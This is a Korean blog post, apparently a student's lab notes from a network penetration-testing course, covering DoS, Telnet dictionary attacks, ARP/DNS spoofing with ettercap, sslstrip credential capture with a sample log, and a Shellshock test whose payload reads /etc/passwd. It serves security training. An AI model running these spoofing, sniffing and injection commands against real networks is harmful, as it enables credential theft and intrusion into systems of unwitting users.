로컬 시스템 부하 공격 (DoS Attack)
Linux200
[~]# mkdir /test
[~]# cd /test
[/test] # vi cpu1.sh
[/test] # chmod 755 *.sh
[/test] # ./cpu1.sh
ctrl + c
Brute Force & Dictionary 공격
- Brute Force 공격 : 무작위 대입 공격
- Dictionary 공격 : 사전 파일 대입 공격
Win2008
- Linux200(192.168.20.200)에 대해서 서비스 포트를 스켄한다. (툴 : zenmap)
- BrutusA2 툴을 실행하여, Linux200에 대해서 Dictionary 공격을 실시
Target : 192.168.20.200 -> Type : Telnet -> Start 클릭 -> user01 정보가 나왔으면, Stop
계정과 비밀번호가 확인되었으므로
확인한 계정과 비밀번호를 입력하면 로그인됨을 알 수 있다.
Packet Sniffing 공격 약간 스누핑공격과 비슷함
Kali Linux
root@kali:~# ettercap -G &
DNS Spoofing 공격
Kali Linux는 데미안 계열으로써 HTTP 설정 파일 이름이 다르다.
root@kali:~# ls /etc/apache2/
apache2.conf conf-enabled magic mods-enabled sites-available
conf-available envvars mods-available ports.conf sites-enabled
root@kali:~# ettercap -G & : ettercap 툴 실행을 하고 나서 이전에 ettercap으로 ARP 스푸핑을 했을때 설정을
이어서 설정한다.
ettercap 스니핑 중지 (Start -> Stop sniffing) 및 종료
Window2008
- DNS 캐싱 정보 초기화 실시
C:\Users\Administrator>ipconfig /flushdns
SNMP 스누핑 공격 예제
HTTPs 패스워드 크래킹
Window2008
- Internet Explorer를 이용하여 'http://www.hotmail.com' 접속 실시 및 로그인
- 로그인 정보 (abcd@test.com/abcd1234)
Kali Linux
- sslstrip 툴 동작 중지
root@kali:~# sslstrip -l 10000
sslstrip 0.9 by Moxie Marlinspike running...
(ctrl+c)
sslstrip.log 확인
root@kali:~# cat sslstrip.log
2016-05-26 13:04:25,781 SECURE POST Data (login.live.com):
loginfmt=abcd@test.com&login=abcd@test.com&passwd=abcd1234&type=11&PPFT=De8PnoZdlop74KcE8nGG*ypS5t6upeX9zLohm5mhYl%21*lEkYvn4k2Wt%21yLX7nauWCcyN9i0hHB9VbdSGPFcRvSr0maI*VzOAF6rAsVduLA898PyIOyyNV6tzVPJLIFZt*v28iL0c93NjunNX80COjFg8VzXs*7vTh05UHwxCq69vPNxnmXt6HZWqa85YpRVyCiHcZxd8p7DaNsPcru9RMI0s0QVVueI4NudUZoZyN38IAeFTO7DzX4oQhnY98B*pGA%24%24&PPSX=Pas&NewUser=1&LoginOptions=3&FoundMSAs=&fspost=0&i2=1&i16=&i17=0&i18=__DefaultLogin_Strings%7C1%2C__DefaultLogin_Core%7C1%2C&i19=&i21=0&i22=0&i13=0
- ARP 스푸핑 해지
(터미널2)
root@kali:~# arpspoof -i eth1 -t 192.168.20.201 -r 192.168.20.100
~ 중간 생략 ~
(ctrl+c)
- iptables 추가 설정 삭제
root@kali:~# iptables -t nat -F PREROUTING
Bash Shell Bug 유무 확인
@ Linux 200
~ 중간 생략 ~
- 즉, env x='() {A;}' bash -c 'x' 라고 설정하면, x 명령은 A에 해당되는 결과만 제공한다.
- 만약, env x='() {A;}; B' bash -c 'x' 라고 설정하면, x는 명령은 B에 해당되는 결과까지도 제공되는 문제가 발생한다
현재 버전 확인.
[~]# rpm -qa | grep bash
bash-3.2-32.el5_9.1
- Bash Shell Bug 해결 방법은 다음과 같이 최신 버전으로 업데이트를 실시한다.
[~]# yum -y install bash
[~]# rpm -qa | grep bash
bash-3.2-33.el5_11.4
- Bash Shell Bug가 있는지 확인한다.
[~]# env x='() { :;}; cat /etc/passwd' bash -c "echo this is a test"
this is a test
'네트워크/서버/모의해킹 > 네트워크 해킹' 카테고리의 다른 글
17.5.11(60일차 네트워크 해킹-1) (493) | 2017.05.11 |
---|---|
17.5.10(59일차 네트워크 해킹-1) (518) | 2017.05.10 |
17.5.4(57일차 네트워크 해킹-1) (496) | 2017.05.04 |